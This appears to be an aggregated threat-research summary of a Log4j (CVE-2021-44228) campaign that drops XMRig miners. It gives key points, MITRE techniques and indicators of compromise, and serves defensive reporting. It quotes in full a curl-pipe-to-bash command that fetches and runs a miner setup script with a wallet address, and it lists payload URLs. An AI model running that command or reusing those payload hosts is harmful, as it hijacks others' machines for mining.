Threat Research

Inside Our Discovery of the Log4j Campaign and Its XMRig Malware

Securonix

Uptycs Threat Research Team uncovered a large-scale Log4j campaign that actively deploys XMRig miners across thousands of hosts. The operation exploits CVE-2021-44228 via crafted HTTP requests and JNDI lookups to fetch payloads and drop miner malware on targeted systems. hashtags: #XMRig #Log4j #CVE-2021-44228 #JNDI #Lazarus #APT28 #NineRAT #DLRAT #BottomLoader #Kinsing #NightSky

Keypoints

  • The campaign is active with 1700+ dedicated IPs implicated in its operations.
  • The ultimate objective is to deploy the XMRig cryptominer onto targeted systems.
  • The exploitation centers on CVE-2021-44228 in Apache Log4j 2, with PoCs and in-the-wild activity observed.
  • infection starts with a crafted HTTP request; Log4j logs the exploit string in the user-agent header and triggers a network request to attacker-controlled servers via JNDI.
  • Attackers use a four-homed C2 setup to distribute XMRig (and occasionally Mirai or Gafgyt) payloads across compromised hosts.
  • Windows malware (NineRAT, DLRAT, BottomLoader) and Linux malware (Kinsing, NightSky, Mirai, Tsunami, Mushtik) appear in campaigns tied to Log4j exploitation.
  • Geographic distribution shows China as the leading region, followed by several other countries; Uptycs XDR provides YARA-based detection and toolkit insights.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The infection sequence initiates with the transmission of a meticulously crafted HTTP request by an attacker to a designated system employing Log4j. Subsequently, Log4j generates a log entry incorporating the exploit string designated within the HTTP user-agent header. “The infection sequence initiates with the transmission of a meticulously crafted HTTP request by an attacker to a designated system employing Log4j. Subsequently, Log4j generates a log entry incorporating the exploit string designated within the HTTP user-agent header.”
  • [T1105] Ingress Tool Transfer – After compromising a victim, the attacker fetches a shell script for deploying the XMRig miner or other malware. “subsequent to compromising a victim machine, it initiated contact with a URL to fetch a shell script for the deployment of the XMRig miner, or alternatively, in select instances, it disseminated Mirai or Gafgyt malware.”
  • [T1059.004] Unix Shell – Linux/macOS command execution to deploy payloads using shell. “curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGNì=»”
  • [T1027] Obfuscated/Compressed Files and Information – Encoded/base64 payloads identified within the campaign. “Base64 code has also been identified, as shown in below figure 2.”
  • [T1496] Resource Hijacking – The final payload drops the XMRig cryptominer. “which drops the XMRig cryptominer malware.”

Indicators of Compromise

  • [IP] 139.99.171.1 – used as a C2-related host in the campaign (port 3306 referenced).
  • [IP] 146.59.16.84 – another C2-related host (port 3306 referenced).
  • [IP] 200.150.202.54 – observed in campaign artifacts and C2 activity.
  • [IP] 200.150.205.65 – observed in the C2 table and payload delivery.
  • [IP] 95.214.27.7 – used in campaign payload delivery and C2 activity.
  • [Domain] download.c3pool.org – host for miner deployment scripts.
  • [Domain] cdn.x4b.lol – used as part of the infrastructure.
  • [URL] http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh – payload deployment script.
  • [URL] http://200.150.205.65/8UsA.sh – downloaded script as part of the campaign.
  • [URL] http://95.214.27.7/base/customx86 – miner-related payload.
  • [URL] https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh – alternative miner deployment script.
  • [SHA256] 6731b2b5441e4782b8ca3a373a610993c049860e5afa862b9950d58060b0dcfe
  • [SHA256] 6c62a1b489409cb30e93bba0ee7042d780e22268f2e7a603fb39615aa5c19fab
  • [SHA256] c3ab1f5e612afac2e6bcbec0f6b4316853e3168f274540d97701bd21564fec9d
  • [SHA256] 21e45b71b4fa863a6402df03158229ce9ca13969eb240dc899b8ae28e43e82a6

Read more: https://www.uptycs.com/blog/log4j-campaign-xmrig-malware

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint